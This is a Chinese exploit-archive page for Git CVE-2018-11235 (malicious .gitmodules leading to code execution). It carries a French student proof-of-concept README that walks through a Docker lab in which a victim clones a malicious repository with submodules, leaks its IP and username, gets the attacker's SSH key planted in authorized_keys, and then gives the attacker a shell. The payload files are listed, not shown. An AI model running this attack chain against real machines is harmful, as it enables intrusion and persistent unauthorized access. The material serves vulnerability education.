关联漏洞
标题:Git 安全漏洞 (CVE-2018-11235)Description:Git是美国软件开发者林纳斯-托瓦兹(Linus Torvalds)所研发的一套免费、开源的分布式版本控制系统。 Git中存在安全漏洞,该漏洞源于在将子模块名称添加到$GIT_DIR/modules目录下时,程序没有正确的验证来自不可信.gitmodules文件的子模块名称。远程攻击者可借助特制的.gitmodules文件利用该漏洞执行任意代码。以下版本受到影响:Git 2.13.7之前版本,2.14.4之前的2.14.x版本,2.15.2之前的2.15.x版本,2.16.4之前的2.16.x版本,2.1
Description
Proof of Concept - RCE Exploitation : Git submodules' names vulnerability - Ensimag November 2018
介绍
# CVE-2018-11235
## Getting started
Pour build les conteneurs dockers, utilisez :
```sh
make docker
```
(Les commandes make suivantes sont à lancer en parallèle sur différents terminaux depuis votre machine)
Pour démarrer le conteneur du serveur attaquant, utilisez :
``` sh
make run_server
```
pour démarrer le conteneur représentant la victime, utilisez :
``` sh
make run_client
```
Le conteneur va lancer le script client.py. Le script va transmettre son adresse Ip et son nom de utilisateur au pirate.
Suivez les instructions de la console des clients pour cloner le dépôt git malveillant.
``` sh
git clone --recurse-submodules root@server:home/poc/malicious_repo client_pwned
```
Vous constaterez que l'adresse IP et le nom d'utilisateur de la victime sont transmis au serveur.
Après le clone, vérifiez que la clé publique des attaquants est bien ajoutée aux authorized_keys du client.
Ensuite, vous pouvez ouvrir un shell sur le client depuis le serveur, grâce à la commande suivante (à executer sur votre machine):
```sh
make server_bash
```
`ssh <transmitted_username>@<transmitted_host>`
## Questions
Si vous avez quelques problèmes que ce soit pour executer ce Proof of Concept, veuillez créer
une issue sur ce dépôt: https://github.com/ygouzerh/CVE-2018-11235/issues , nous vous répondrons le plus
rapidement possible.
文件快照
[4.0K] /data/pocs/1e4462c75e0da7f4f9d69425de50ce6dedfb563f
├── [4.0K] build
├── [ 865] client.py
├── [4.0K] dist
├── [ 694] Dockerfile.client
├── [ 814] Dockerfile.server
├── [4.0K] key
├── [ 358] Makefile
├── [4.0K] poc
│ ├── [ 136] attack.sh
│ ├── [1.1K] build.sh
│ └── [6.2K] surprise.txt
├── [246K] rapport.pdf
├── [1.3K] README.md
├── [ 253] requirements.txt
└── [ 652] server.py
4 directories, 11 files
备注
1. 建议优先通过来源进行访问。
2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →